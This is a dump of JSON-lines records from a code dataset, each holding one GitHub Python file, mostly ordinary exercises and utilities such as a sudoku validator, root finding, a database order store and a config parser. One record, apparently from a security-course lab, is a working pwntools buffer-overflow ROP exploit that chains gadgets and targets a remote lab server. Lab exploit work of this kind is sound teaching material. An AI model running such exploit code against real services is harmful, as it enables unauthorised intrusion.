10)\n# threshed = threshold_image(filt, 200)[1]\n# plt.imshow(threshed, cmap='gray')\n# plt.show()\n# cont_lst = find_contours(threshed)\n# marked = mark_contours(cont_lst, img, 2, True)\n# for im in marked:\n# plt.imshow(im, cmap='gray')\n# plt.show()\n # ai_detector(\"32X32 cells, 21 ancillas, 9 transparencies, 5 R.png\")\n","repo_name":"Shulik95/Fidelity_Calculator","sub_path":"Fidelity_calculator.py","file_name":"Fidelity_calculator.py","file_ext":"py","file_size_in_byte":7678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"6162715479","text":"# -*- coding: utf-8 -*-\n\nimport pygame\nfrom screen import Screen\n\nclass Help(object):\n SAVE = []\n\n def __init__(self, vimim):\n self.vimim = vimim\n\n def draw(self, ctx):\n screen = Screen()\n for y, line in enumerate(help_lines[0:24]):\n screen.write(0, y, line[0:80])\n if self.vimim.have_status_bar:\n self.vimim.draw_generic_status_bar(screen)\n screen.write(0, 24, u'-- POMOCNÍK MODE --')\n self.vimim.postprocess_screen(screen)\n self.vimim.window.draw_terminal(self.vimim.window, ctx, screen)\n\n def keydown(self, event):\n if event.mod & (pygame.KMOD_CTRL | pygame.KMOD_ALT):\n self.vimim.bell()\n return\n if event.key == pygame.K_p:\n self.vimim.app = self.vimim.editor_app\n else:\n self.vimim.bell()\n\n def idle(self):\n self.vimim.game_app.idle()\n\n\nhelp_text = u'''\n\n VIMIM - Vi Improved Improved\n\n\n Základné príkazy:\n\n C = Config fičúrií a zadávanie kupónov\n G = Game mode\n P = Pomocník zap/vyp\n S = Submitúúúj\n U = Undo mode\n\n\n Čo nič nerobí:\n\n * Escape nič nerobí\n * Meta nič nerobí\n * Alt nič nerobí\n * Ctrl nič nerobí\n * Super/Win nič nerobí\n * myš nič nerobí\n * príkazy sú iba písmená a nezáleží na veľkosti\n\n'''\nhelp_lines = help_text.split(u'\\n')[1:]\n","repo_name":"TomiBelan/ksp-vimim","sub_path":"help.py","file_name":"help.py","file_ext":"py","file_size_in_byte":1382,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"34727448882","text":"arr= [ \"..4...63.\", \".........\", \"5......9.\", \"...56....\", \"4.3.....1\", \"...7.....\", \"...5.....\", \".........\", \".........\" ]\r\n\r\nimport numpy as 
np\r\n\r\n\r\nsudoku=[[0 for i in range(9)] for j in range(9)]\r\nfor i in range(len(arr)):\r\n    for j in range(len(arr[i])):\r\n        if arr[i][j]!=\".\":\r\n            sudoku[i][j]=int(arr[i][j])\r\ngame=np.array(sudoku)\r\n\r\nvalid = 1\r\n\r\n# row/column check: a placed digit may appear only once in its row and in its column\r\nfor i in range(9):\r\n    for j in range(9):\r\n        num = game[i][j]\r\n        if num != 0 and (np.count_nonzero(game[i, :] == num) > 1 or np.count_nonzero(game[:, j] == num) > 1):\r\n            valid = 0\r\n\r\n# 3x3 block check: every placed digit must be unique inside its block\r\nfor bi in (0, 3, 6):\r\n    for bj in (0, 3, 6):\r\n        block = game[bi:bi + 3, bj:bj + 3]\r\n        filled = block[block != 0]\r\n        if filled.size != len(set(filled.tolist())):\r\n            valid = 0\r\n\r\nprint(valid)\r\n","repo_name":"rajansh87/Data-Structures-and-Algorithms-Implementations","sub_path":"HASHING/Valid sudoku.py","file_name":"Valid sudoku.py","file_ext":"py","file_size_in_byte":2833,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"31819895132","text":"from package import redact_ex, ask_continue\n\nfrom package import \\\n    find_sols, \\\n    bisect_solve\n\nimport numpy as np\n\nimport warnings\nwarnings.filterwarnings('ignore', category = RuntimeWarning)\n\nEXERCISE_05 = \"\"\"\\\nFind the roots of y(x) = (29.52/(x-0.12)) * e**(-0.686/x) - 11\\\n\"\"\"\n\nredact_ex(EXERCISE_05, 5)\n\n\ndef f(x):\n    return (29.52/(x-0.12)) * np.exp(-0.686/x) - 11\n\ninterval = [0.1, 2.2] # interval chosen by inspection\nxmin, xmax = interval\nn = 4094\n\nxlin = np.linspace(xmin, xmax, n+1)\n\nsols = find_sols(f, xlin)\n\nsol_points = []\nfor sol in sols:\n    print(f\"case: solution in {sol}\", end = '\\n')\n    sol_point = bisect_solve(f, sol, 63, verbose = True)\n    sol_points.append(sol_point)\n    print()\n\nsol_points = sol_points[1:] # ignore the false solution\n\"\"\"\nThe above can be seen as bad code practice at first.\nWhy not just have the function not return false 
solutions?\nNotice the way we construct the array containing the solutions\nis exterior to the function that retrieves the accurate solution points.\nTherefore, making it return None would just yield a None value inside\nthe solution array. This could be then fixed with the line\n\nif sol_point is not None: sol_points.append(sol_point)\n\nbut we would not get anything from this operation since this fix is also\n(compared to the fix I have written above) exterior to the main function.\nOne could argue this would be a better implementation, since it would allow\nto disregard any number of false solutions indistinctively. However, it could\nbe a possibility that we wanted to do something with the false solution\npoints, so returning them regardless is actually a better implementation\nsince clearing the solutions array from unwanted solution points should\nanyway be done in a separate code block, like it is done above.\n\nWould adding a \"false\" flag to the main function's returns be a good idea?\nMaybe. However, if dealing with a large number of solutions, you just doubled\nthe size of the array with potentially a large percentage of useless data\n(false solutions can be expected analitically).\n\"\"\"\n\n# plotting\nprint(\"Plotting follows.\")\nask_continue()\n\nimport matplotlib.pyplot as plt\n\nplt.rc('text', usetex = True)\nplt.rc('font', family = 'sans-serif')\n\nplt.figure()\nplt.title(r\"$y(x) = \\frac{29.52}{x-0.12}\\:e^{\\frac{-0.686}{x}} - 11$\",\n fontdict = {'fontsize' : 16})\n\nplt.plot(xlin, f(xlin), 'blue', zorder = 1)\n\nplt.ylim(-5, 10)\nplt.xlim(min(xlin)-0.12, max(xlin))\ngsize = plt.ylim()[1] - plt.ylim()[0]\n\nplt.hlines(0, min(xlin)-0.12, max(xlin), 'black', zorder = 0)\n\nfor i, sol in enumerate(sol_points):\n plt.vlines(sol, f(sol)-gsize/20, f(sol)+gsize/20, color = 'red', zorder = 2)\n plt.text(sol+(0.08 if i != 2 else 0), f(sol)+gsize/(16 if i != 0 else 8),\n f'x = {sol:.5f}',\n horizontalalignment = 'center', zorder = 3+i)\n\nplt.show()","repo_name":"mariogarcc/comphy","sub_path":"T01/ex05.py","file_name":"ex05.py","file_ext":"py","file_size_in_byte":2834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"19879124973","text":"from db.db import DB\nfrom typing import List\nfrom dataclasses import dataclass\n\n\n@dataclass\nclass Order:\n buyer_id: int\n link: str\n price: int\n size: str = \"one size\"\n id: int = None\n\n def custom_str(self, yuan_rate: float) -> str:\n rub_price = round(1.05 * 1.05 * self.price * yuan_rate + 1000)\n return f\"{self.link}\\nРазмер: {self.size}\\nЦена в юанях: {self.price}\\nЦена в рублях: {rub_price}\"\n\n\nclass OrderStorage:\n __table = \"orders\"\n\n def __init__(self, db: DB):\n self._db = db\n\n async def init(self):\n await self._db.execute(\n f\"\"\"\n CREATE TABLE IF NOT EXISTS {self.__table} (\n id SERIAL PRIMARY KEY,\n buyer_id BIGINT,\n link TEXT,\n size TEXT NOT NULL DEFAULT 'one size',\n price INT,\n FOREIGN KEY (buyer_id) REFERENCES users(id) ON DELETE CASCADE\n )\n \"\"\"\n )\n\n async def get_by_id(self, order_id: int) -> Order | None:\n data = await self._db.fetchrow(\n f\"SELECT * FROM {self.__table} WHERE id = $1\", order_id\n )\n if data is None:\n return None\n return Order(\n id=data[0], buyer_id=data[1], link=data[2], size=data[3], price=data[4]\n )\n\n async def get_orders_by_user_id(self, user_id: int) -> List[Order] | None:\n data = await self._db.fetch(\n f\"SELECT * FROM {self.__table} WHERE buyer_id = $1\", user_id\n )\n if data is None:\n 
return None\n        return [\n            Order(\n                id=order_data[0],\n                buyer_id=order_data[1],\n                link=order_data[2],\n                size=order_data[3],\n                price=order_data[4],\n            )\n            for order_data in data\n        ]\n\n    async def create(self, order: Order):\n        await self._db.execute(\n            f\"\"\"\n            INSERT INTO {self.__table} (buyer_id, link, size, price) VALUES ($1, $2, $3, $4)\n            \"\"\",\n            order.buyer_id,\n            order.link,\n            order.size,\n            order.price,\n        )\n\n    async def get_all_members(self) -> List[Order] | None:\n        data = await self._db.fetch(\n            f\"\"\"\n            SELECT * FROM {self.__table}\n            \"\"\"\n        )\n        if data is None:\n            return None\n        return [\n            Order(\n                id=order_data[0],\n                buyer_id=order_data[1],\n                link=order_data[2],\n                size=order_data[3],\n                price=order_data[4],\n            )\n            for order_data in data\n        ]\n\n    async def get_orders_amount(self) -> int:\n        return await self._db.fetchval(f\"SELECT COUNT(*) FROM {self.__table}\")\n\n    async def delete(self, order_id: int):\n        await self._db.execute(\n            f\"\"\"\n            DELETE FROM {self.__table} WHERE id = $1\n            \"\"\",\n            order_id,\n        )\n","repo_name":"w1sq/fedor_poizon","sub_path":"db/storage/orders.py","file_name":"orders.py","file_ext":"py","file_size_in_byte":2985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"1446298009","text":"\nimport pathlib\n\nfrom setuptools import setup\n\nfrom py2appsigner import __version__ as version\n\n# The directory containing this file\nHERE = pathlib.Path(__file__).parent\n\n# The text of the README file\nREADME = (HERE / \"README.md\").read_text()\nLICENSE = (HERE / 'LICENSE').read_text()\n\nsetup(\n    name=\"py2appsigner\",\n    version=version,\n    author='Humberto A. Sanchez II',\n    author_email='humberto.a.sanchez.ii@gmail.com',\n    maintainer='Humberto A. Sanchez II',\n    maintainer_email='humberto.a.sanchez.ii@gmail.com',\n    description='Scripts to Code Sign py2app applications',\n    long_description=README,\n    long_description_content_type=\"text/markdown\",\n    license=LICENSE,\n    url=\"https://github.com/py2appsigner\",\n    packages=[\n        'py2appsigner',\n        'py2appsigner.environment',\n        'py2appsigner.resources',\n    ],\n    package_data={\n        'py2appsigner.resources': ['loggingConfiguration.json'],\n    },\n\n    install_requires=[\n        'click~=8.1.7', 'tqdm==4.66.1',\n    ],\n    entry_points={\n        \"console_scripts\": [\n            \"py2appSign=py2appsigner.Commands:py2appSign\",\n            \"appNotarize=py2appsigner.Commands:appNotarize\",\n            \"appStaple=py2appsigner.Commands:appStaple\",\n            \"appVerify=py2appsigner.Commands:appVerify\",\n            \"notaryTool=py2appsigner.Commands:notaryTool\",\n            \"py2appsigner=py2appsigner.Commands:py2appsigner\",\n        ]\n    },\n)\n","repo_name":"hasii2011/py2appsigner","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"36122539249","text":"'''\r\nThere is a single meeting room, and we want to build a usage schedule for the N meetings that wish to use it. \r\nEach meeting I has a start time and an end time; find the maximum number of meetings that can use the room without any of them overlapping. \r\nNote that a meeting cannot be interrupted once it has started, and a new meeting may begin at the exact moment the previous one ends. \r\nA meeting's start time may be equal to its end time. 
In that case, the meeting can be considered to end as soon as it starts.\r\n\r\nFirst line: the number of meetings\r\nFollowing lines: each meeting's start and end times\r\n\r\n13\r\n1 4\r\n3 5\r\n0 6\r\n5 7\r\n3 8\r\n5 9\r\n6 10\r\n8 8\r\n8 9\r\n8 11\r\n8 12\r\n2 13\r\n12 14\r\n\r\nOutput\r\n4\r\n# confer = int(input())\r\n# runTime = [tuple(map(int, input().split())) for _ in range(confer)]\r\n# confer = 11\r\n# runTime = [[1,4],[3,5],[0,6],[5,7],[3,8],[5,9],[6,10],[8,12],[8,12],[2,13],[12,14]]\r\n'''\r\nimport sys\r\n\r\ninputSys = sys.stdin.readline\r\n\r\nconferAllCount = int(input())\r\nconferTime = [(*map(int, input().split()),) for _ in range(conferAllCount)]\r\nprint(conferTime)\r\nresultConCnt = 0\r\neachEndTime = 0\r\n\r\nconferTime.sort(key=lambda x : x[0], reverse=False)\r\nconferTime.sort(key=lambda x : x[1], reverse=False)\r\n\r\nfor i, j in conferTime:\r\n    if i >= eachEndTime:\r\n        resultConCnt += 1\r\n        eachEndTime = j\r\nprint(resultConCnt)\r\n \r\n# runTime = sorted(runTime, key=lambda x : (x[1],[0]), reverse=False)\r\n# lastTime,count = 0, 0\r\n# for i,j in runTime:\r\n#     print(i,j)\r\n#     if i >= lastTime:\r\n#         count += 1\r\n#         lastTime = j\r\n# print(count) \r\n \r\n\r\n","repo_name":"codBaksal/pyBeakjoon","sub_path":"PyBeakjoon/conferenceRoom.py","file_name":"conferenceRoom.py","file_ext":"py","file_size_in_byte":1675,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"40600654885","text":"from pwn import *\n\nBIN = './ret_to_main'\ncontext.binary = BIN\n\n# p = process(BIN)\np = remote(\"141.85.224.157\", 31341)\nelf = ELF(BIN)\nrop = ROP(BIN)\n\nstop = elf.symbols['stop']\nright = elf.symbols['right']\nthere = elf.symbols['there']\nmain = elf.symbols['main']\noffset = 0x30 + 8\nrdi = rop.find_gadget(['pop rdi', 'ret'])[0]\nrsi = rop.find_gadget(['pop rsi', 'ret'])[0]\n\np.recvuntil(b'message: \\n')\npayload_open = offset * b'a' + p64(rdi) + p64(0x4ABADA55) + p64(stop) + p64(main)\np.sendline(payload_open)\np.recvline()\n\np.recvuntil(b'message: \\n')\npayload_read = offset * b'a' + p64(rdi) + p64(0xD15EA5ED) + p64(rsi) \\\n\t+ p64(0x4B1DDE9) + p64(right) + p64(main)\np.sendline(payload_read)\np.recvline()\n\np.recvuntil(b'message: \\n')\npayload_read = offset * b'a' + p64(there)\np.sendline(payload_read)\nprint(p.recvline().decode().rstrip())\n","repo_name":"teodutu/CNS","sub_path":"Labs/Lab9/01-return-to-main/exploit.py","file_name":"exploit.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"73746292901","text":"#!/usr/bin/python3\n''' pascal triangle Module '''\n\n\ndef pascal_calculation(my_list):\n    ''' calculate numbers inside list '''\n    new = []\n    prevElement = 0\n    counter = 0\n\n    for i in my_list:\n        new.append(i + prevElement)\n        prevElement = i\n        counter += 1\n\n    # append last element\n    new.append(my_list[-1])\n\n    return new\n\n\ndef pascal_triangle(n):\n    ''' returns a list of lists of integers representing Pascal’s triangle '''\n    matrix = [[1]]\n    if n <= 0:\n        return []\n    for i in range(n - 1):\n        new_list = pascal_calculation(matrix[-1])\n        matrix.append(new_list)\n    return matrix\n","repo_name":"maleksal/holbertonschool-higher_level_programming","sub_path":"0x0B-python-input_output/14-pascal_triangle.py","file_name":"14-pascal_triangle.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"37865320311","text":"\"\"\"\nVerify Anagrams\n\nAn anagram is a type of word play, the result of rearranging the letters of a word 
or\nphrase to produce a new word or phrase, using all the original letters exactly once.\nTwo words are anagrams to each other if we can get one from another by rearranging\nthe letters. Anagrams are case-insensitive and don't take account whitespaces.\nFor example: \"Gram Ring Mop\" and \"Programming\" are anagrams.\nBut \"Hello\" and \"Ole Oh\" are not.\n\nYou are given two words or phrase. Try to verify are they anagrams or not.\n\nInput: Two arguments as strings.\n\nOutput: Are they anagrams or not as boolean (True or False)\n\nPrecondition: 0 < |first_word| < 100;\n0 < |second_word| < 100;\nWords contain only ASCII latin letters and whitespaces.\n\nPerformance:\nverify_anagrams_counter took: 0.281242\nverify_anagrams_sorted took: 0.049765\n\"\"\"\n\nfrom collections import Counter\nfrom timeit import timeit\n\n\ndef verify_anagrams_sorted(a: str, b: str) -> bool:\n \"\"\"Using sorted algorithm.\"\"\"\n return sorted(a.lower().replace(\" \", \"\")) == sorted(b.lower().replace(\" \", \"\"))\n\n\ndef verify_anagrams_counter(a: str, b: str) -> bool:\n \"\"\"Using Counter object.\"\"\"\n return Counter(a.lower().replace(\" \", \"\")) == Counter(b.lower().replace(\" \", \"\"))\n\n\nif __name__ == \"__main__\":\n for f in [verify_anagrams_counter, verify_anagrams_sorted]:\n assert isinstance(f(\"a\", \"z\"), bool), \"Boolean!\"\n assert f(\"Programming\", \"Gram Ring Mop\") is True, \"Gram of code\"\n assert f(\"Hello\", \"Ole Oh\") is False, \"Hello! Ole Oh!\"\n assert f(\"Kyoto\", \"Tokyo\") is True, \"The global warming crisis of 3002\"\n assert f(\"The Morse Code\", \"There Come Dots\") is False, \"Checkio\"\n\n t = timeit(\n stmt=\"f('The Morse Code', 'There Come Dots')\",\n number=10000,\n globals=globals(),\n )\n print(f\"{f.__name__} took: {t:.6f}\")\n print(\"Done!\")\n","repo_name":"vlad-bezden/py.checkio","sub_path":"scientific_expedition/verify_anagrams.py","file_name":"verify_anagrams.py","file_ext":"py","file_size_in_byte":1890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"71337603300","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Templates for common tasks in ML and statistics.\"\"\"\n\nimport numpy as np\nfrom functools import partial\nfrom .core import plot, bar, hist\nimport math\n\nprob_hist = partial(\n hist,\n ylab=\"Observation Count (Valid)\",\n xlab=\"Probability Bucket\",\n bins=np.arange(0, 1.01, 0.05),\n)\nprob_hist.__doc__ = \"\"\"Histogram for charting probabilities.\"\"\"\n\npr_curve = partial(\n plot,\n labels=[\"Recall\", \"Precision\"],\n xlab=\"Threshold Cutoff for Positive Class\",\n ylab=\"Precision or Recall\",\n title=\"Choosing a Threshold\",\n markers=[\"g-\", \"g--\", \"b-\", \"b--\", \"r-\", \"r--\"],\n pct_ticks=(False, True),\n grid=True,\n)\npr_curve.__doc__ = \"\"\"Dashed line chart for charting precision and recall curve.\"\"\"\n\n\nacc_vs_cov = partial(\n plot,\n xlab=\"Document Coverage\",\n ylab=\"Document Accuracy\",\n grid=True,\n markers=[\"k--\", \"ko-\", \"ks-\"],\n xticks=np.arange(0, 1.05, 0.1),\n markersize=8,\n title=\"Accuracy vs. 
Document Coverage\",\n pct_ticks=(True, True),\n)\n\npr_curve.__doc__ = \"\"\"Dashed line chart for accuracy and coverage.\"\"\"\n\nexpected = [0.55, 0.65, 0.75, 0.85, 0.95]\ngrp_labels = [f\"{10*math.floor(10*i)}-{10+10*math.floor(10*i)}%\" for i in expected]\ncalib = partial(\n bar,\n x=grp_labels,\n xlab=\"Probability Bucket\",\n ylab=\"Accuracy\",\n ylim=[0.4, 1],\n grid=True,\n alpha=0.8,\n pct_ticks=True,\n)\n\npr_curve.__doc__ = \"\"\"For assessing model calibration.\"\"\"\n","repo_name":"awslabs/plit","sub_path":"src/plit/templates.py","file_name":"templates.py","file_ext":"py","file_size_in_byte":1438,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"35"} +{"seq_id":"39505230506","text":"#coding=utf-8\n\nfrom PySide2 import QtWidgets,QtCore,QtGui\nimport sys\napp=QtWidgets.QApplication(sys.argv)\n\n\ntreeView=QtWidgets.QTreeView()\nrootItem=QtGui.QStandardItem('this')\nchildItem=QtGui.QStandardItem('1')\nchildItem1=QtGui.QStandardItem('2')\nrootItem.setChild(1,childItem)\nfileModel=QtGui.QStandardItemModel(treeView)\nfileModel.setItem(0,rootItem)\nfileModel.setItem(1,2,childItem1)\ntreeView.setModel(fileModel)\ntreeView.show()\n\nsys.exit(app.exec_())\n","repo_name":"hebingyedu/Hyperspetral-Image-segmentation","sub_path":"treeView.py","file_name":"treeView.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"19733797729","text":"\"\"\"\nConfiguration file!\n\"\"\"\nimport os\nfrom argparse import ArgumentParser\n\nimport numpy as np\n\nROOT_PATH = os.path.dirname(os.path.realpath(__file__))\nDATA_PATH = os.path.join(ROOT_PATH, \"data\")\n\n\ndef path(fn):\n return os.path.join(DATA_PATH, fn)\n\n\ndef stanford_path(fn):\n return os.path.join(DATA_PATH, \"stanford_filtered\", fn)\n\n\n# =============================================================================\n# Update these with where your data is stored ~~~~~~~~~~~~~~~~~~~~~~~~~\n\nVG_IMAGES = path(\"visual_genome\")\nRCNN_CHECKPOINT_FN = path(\"faster_rcnn_500k.h5\")\n\nIM_DATA_FN = stanford_path(\"image_data.json\")\nVG_SGG_FN = stanford_path(\"VG-SGG.h5\")\nVG_SGG_DICT_FN = stanford_path(\"VG-SGG-dicts.json\")\nPROPOSAL_FN = stanford_path(\"proposals.h5\")\n\n# =============================================================================\n# =============================================================================\n\n\nMODES = (\"sgdet\", \"sgcls\", \"predcls\")\n\nBOX_SCALE = 1024 # Scale at which we have the boxes\nIM_SCALE = 592 # Our images will be resized to this res without padding\n\n# Proposal assignments\nBG_THRESH_HI = 0.5\nBG_THRESH_LO = 0.0\n\nRPN_POSITIVE_OVERLAP = 0.7\n# IOU < thresh: negative example\nRPN_NEGATIVE_OVERLAP = 0.3\n\n# Max number of foreground examples\nRPN_FG_FRACTION = 0.5\nFG_FRACTION = 0.25\n# Total number of examples\nRPN_BATCHSIZE = 256\nROIS_PER_IMG = 256\nREL_FG_FRACTION = 0.25\nRELS_PER_IMG = 256\n\nRELS_PER_IMG_REFINE = 64\n\nBATCHNORM_MOMENTUM = 0.01\nANCHOR_SIZE = 16\n\nANCHOR_RATIOS = (0.23232838, 0.63365731, 1.28478321, 3.15089189) # (0.5, 1, 2)\nANCHOR_SCALES = (\n 2.22152954,\n 4.12315647,\n 7.21692515,\n 12.60263013,\n 22.7102731,\n) # (4, 8, 16, 32)\n\n\nclass ModelConfig(object):\n \"\"\"Wrapper class for model hyperparameters.\"\"\"\n\n def __init__(self):\n \"\"\"\n Defaults\n \"\"\"\n self.ckpt = None\n self.save_dir = None\n self.lr = None\n self.batch_size = None\n self.val_size = None\n self.l2 = None\n self.adamwd = None\n 
self.clip = None\n        self.num_gpus = None\n        self.num_workers = None\n        self.print_interval = None\n        self.mode = None\n        self.test = False\n        self.adam = False\n        self.cache = None\n        self.use_proposals = False\n        self.use_resnet = False\n        self.num_epochs = None\n        self.pooling_dim = None\n\n        self.use_ggnn_obj = False\n        self.ggnn_obj_time_step_num = None\n        self.ggnn_obj_hidden_dim = None\n        self.ggnn_obj_output_dim = None\n        self.use_obj_knowledge = False\n        self.obj_knowledge = None\n\n        self.use_ggnn_rel = False\n        self.ggnn_rel_time_step_num = None\n        self.ggnn_rel_hidden_dim = None\n        self.ggnn_rel_output_dim = None\n        self.use_rel_knowledge = False\n        self.rel_knowledge = None\n\n        self.tb_log_dir = None\n        self.save_rel_recall = None\n\n        self.parser = self.setup_parser()\n        self.args = vars(self.parser.parse_args())\n\n        print(\"~~~~~~~~ Hyperparameters used: ~~~~~~~\")\n        for x, y in self.args.items():\n            print(\"{} : {}\".format(x, y))\n\n        self.__dict__.update(self.args)\n\n        if len(self.ckpt) != 0:\n            self.ckpt = os.path.join(ROOT_PATH, self.ckpt)\n        else:\n            self.ckpt = None\n\n        if len(self.cache) != 0:\n            if len(self.cache.split(\"/\")) > 1:\n                file_len = len(self.cache.split(\"/\")[-1])\n                cache_dir = self.cache[:-file_len]\n                cache_dir = os.path.join(ROOT_PATH, cache_dir)\n                if not os.path.exists(cache_dir):\n                    os.mkdir(cache_dir)\n            self.cache = os.path.join(ROOT_PATH, self.cache)\n        else:\n            self.cache = None\n\n        if len(self.save_dir) == 0:\n            self.save_dir = None\n        else:\n            self.save_dir = os.path.join(ROOT_PATH, self.save_dir)\n            if not os.path.exists(self.save_dir):\n                os.mkdir(self.save_dir)\n\n        if len(self.tb_log_dir) != 0:\n            self.tb_log_dir = os.path.join(ROOT_PATH, self.tb_log_dir)\n            if not os.path.exists(self.tb_log_dir):\n                os.makedirs(\n                    self.tb_log_dir\n                )  # help make multi depth directories, such as summaries/kern_predcls\n        else:\n            self.tb_log_dir = None\n\n        if len(self.save_rel_recall) != 0:\n            if len(self.save_rel_recall.split(\"/\")) > 1:\n                file_len = len(self.save_rel_recall.split(\"/\")[-1])\n                save_rel_recall_dir = self.save_rel_recall[:-file_len]\n                save_rel_recall_dir = os.path.join(ROOT_PATH, save_rel_recall_dir)\n                if not os.path.exists(save_rel_recall_dir):\n                    os.mkdir(save_rel_recall_dir)\n            self.save_rel_recall = os.path.join(ROOT_PATH, self.save_rel_recall)\n        else:\n            self.save_rel_recall = None\n\n        assert self.val_size >= 0\n\n        if self.mode not in MODES:\n            raise ValueError(\"Invalid mode: mode must be in {}\".format(MODES))\n\n        if self.ckpt is not None and not os.path.exists(self.ckpt):\n            raise ValueError(\"Ckpt file ({}) doesn't exist\".format(self.ckpt))\n\n    def setup_parser(self):\n        \"\"\"\n        Sets up an argument parser\n        :return:\n        \"\"\"\n        parser = ArgumentParser(description=\"training code\")\n\n        parser.add_argument(\n            \"-ckpt\", dest=\"ckpt\", help=\"Filename to load from\", type=str, default=\"\"\n        )\n        parser.add_argument(\n            \"-save_dir\",\n            dest=\"save_dir\",\n            help=\"Directory to save things to, such as checkpoints/save\",\n            default=\"\",\n            type=str,\n        )\n\n        parser.add_argument(\n            \"-ngpu\", dest=\"num_gpus\", help=\"how many GPUs you have\", type=int, default=1\n        )\n        parser.add_argument(\n            \"-nwork\",\n            dest=\"num_workers\",\n            help=\"num processes to use as workers\",\n            type=int,\n            default=1,\n        )\n\n        parser.add_argument(\n            \"-lr\", dest=\"lr\", help=\"learning rate\", type=float, default=1e-3\n        )\n\n        parser.add_argument(\n            \"-b\", dest=\"batch_size\", help=\"batch size per GPU\", type=int, default=2\n        )\n        parser.add_argument(\n            \"-val_size\",\n            dest=\"val_size\",\n            help=\"val size to use (if 
0 we wont use val)\",\n type=int,\n default=5000,\n )\n\n parser.add_argument(\n \"-l2\", dest=\"l2\", help=\"weight decay of SGD\", type=float, default=1e-4\n )\n parser.add_argument(\n \"-adamwd\",\n dest=\"adamwd\",\n help=\"weight decay of adam\",\n type=float,\n default=0.0,\n )\n\n parser.add_argument(\n \"-clip\",\n dest=\"clip\",\n help=\"gradients will be clipped to have norm less than this\",\n type=float,\n default=5.0,\n )\n parser.add_argument(\n \"-p\",\n dest=\"print_interval\",\n help=\"print during training\",\n type=int,\n default=100,\n )\n parser.add_argument(\n \"-m\",\n dest=\"mode\",\n help=\"mode in {sgdet, sgcls, predcls}\",\n type=str,\n default=\"sgdet\",\n )\n\n parser.add_argument(\n \"-cache\",\n dest=\"cache\",\n help=\"where should we cache predictions\",\n type=str,\n default=\"\",\n )\n\n parser.add_argument(\"-adam\", dest=\"adam\", help=\"use adam\", action=\"store_true\")\n parser.add_argument(\"-test\", dest=\"test\", help=\"test set\", action=\"store_true\")\n\n parser.add_argument(\n \"-nepoch\",\n dest=\"num_epochs\",\n help=\"Number of epochs to train the model for\",\n type=int,\n default=50,\n )\n parser.add_argument(\n \"-resnet\",\n dest=\"use_resnet\",\n help=\"use resnet instead of VGG\",\n action=\"store_true\",\n )\n parser.add_argument(\n \"-proposals\",\n dest=\"use_proposals\",\n help=\"Use Xu et als proposals\",\n action=\"store_true\",\n )\n parser.add_argument(\n \"-pooling_dim\",\n dest=\"pooling_dim\",\n help=\"Dimension of pooling\",\n type=int,\n default=4096,\n )\n\n parser.add_argument(\n \"-use_ggnn_obj\",\n dest=\"use_ggnn_obj\",\n help=\"use GGNN_obj module\",\n action=\"store_true\",\n )\n parser.add_argument(\n \"-ggnn_obj_time_step_num\",\n dest=\"ggnn_obj_time_step_num\",\n help=\"time step number of GGNN_obj\",\n type=int,\n default=3,\n )\n parser.add_argument(\n \"-ggnn_obj_hidden_dim\",\n dest=\"ggnn_obj_hidden_dim\",\n help=\"node hidden state dimension of GGNN_obj\",\n type=int,\n default=512,\n )\n parser.add_argument(\n \"-ggnn_obj_output_dim\",\n dest=\"ggnn_obj_output_dim\",\n help=\"node output feature dimension of GGNN_obj\",\n type=int,\n default=512,\n )\n parser.add_argument(\n \"-use_obj_knowledge\",\n dest=\"use_obj_knowledge\",\n help=\"use object cooccurrence knowledge\",\n action=\"store_true\",\n )\n parser.add_argument(\n \"-obj_knowledge\",\n dest=\"obj_knowledge\",\n help=\"Filename to load matrix of object cooccurrence knowledge\",\n type=str,\n default=\"\",\n )\n\n parser.add_argument(\n \"-use_ggnn_rel\",\n dest=\"use_ggnn_rel\",\n help=\"use GGNN_rel module\",\n action=\"store_true\",\n )\n parser.add_argument(\n \"-ggnn_rel_time_step_num\",\n dest=\"ggnn_rel_time_step_num\",\n help=\"time step number of GGNN_rel\",\n type=int,\n default=3,\n )\n parser.add_argument(\n \"-ggnn_rel_hidden_dim\",\n dest=\"ggnn_rel_hidden_dim\",\n help=\"node hidden state dimension of GGNN_rel\",\n type=int,\n default=512,\n )\n parser.add_argument(\n \"-ggnn_rel_output_dim\",\n dest=\"ggnn_rel_output_dim\",\n help=\"node output feature dimension of GGNN_rel\",\n type=int,\n default=512,\n )\n parser.add_argument(\n \"-use_rel_knowledge\",\n dest=\"use_rel_knowledge\",\n help=\"use cooccurrence knowledge of object pairs and relationships\",\n action=\"store_true\",\n )\n parser.add_argument(\n \"-rel_knowledge\",\n dest=\"rel_knowledge\",\n help=\"Filename to load matrix of cooccurrence knowledge of object pairs and relationships\",\n type=str,\n default=\"\",\n )\n\n parser.add_argument(\n \"-tb_log_dir\",\n 
